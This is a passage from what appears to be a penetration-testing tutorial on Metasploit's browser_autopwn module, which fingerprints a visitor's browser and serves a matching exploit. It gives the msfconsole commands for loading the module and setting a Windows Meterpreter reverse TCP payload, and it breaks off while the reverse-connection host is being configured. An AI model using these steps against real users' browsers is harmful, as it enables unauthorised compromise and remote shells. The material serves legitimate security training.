Implementing the browser_autopwn module
Browser_autopwn is an auxiliary module provided by Metasploit that allows you to automate an attack on a victim's machine simply by the user accessing a web page. Browser_autopwn performs a fingerprint of the client before it attacks, meaning that it will not try a Mozilla Firefox exploit against an Internet Explorer 7 browser. Based upon its determination of the browser, it decides which exploit is the best to deploy.
Getting ready
A connection to the Internet or internal network is required to complete this recipe.
How to do it...
Let's begin by opening a terminal window:
Open a terminal window.
Launch the MSFCONSOLE:
msfconsole
Search for the Autopwn modules:
search autopwn
Use the browser_autopwn module:
use auxiliary/server/browser_autopwn
Set our payload. In this case, we use Windows Reverse TCP:
set payload windows/meterpreter/reverse_tcp
Show the options for this type of payload:
show options
Set the host IP address to where the reverse connection...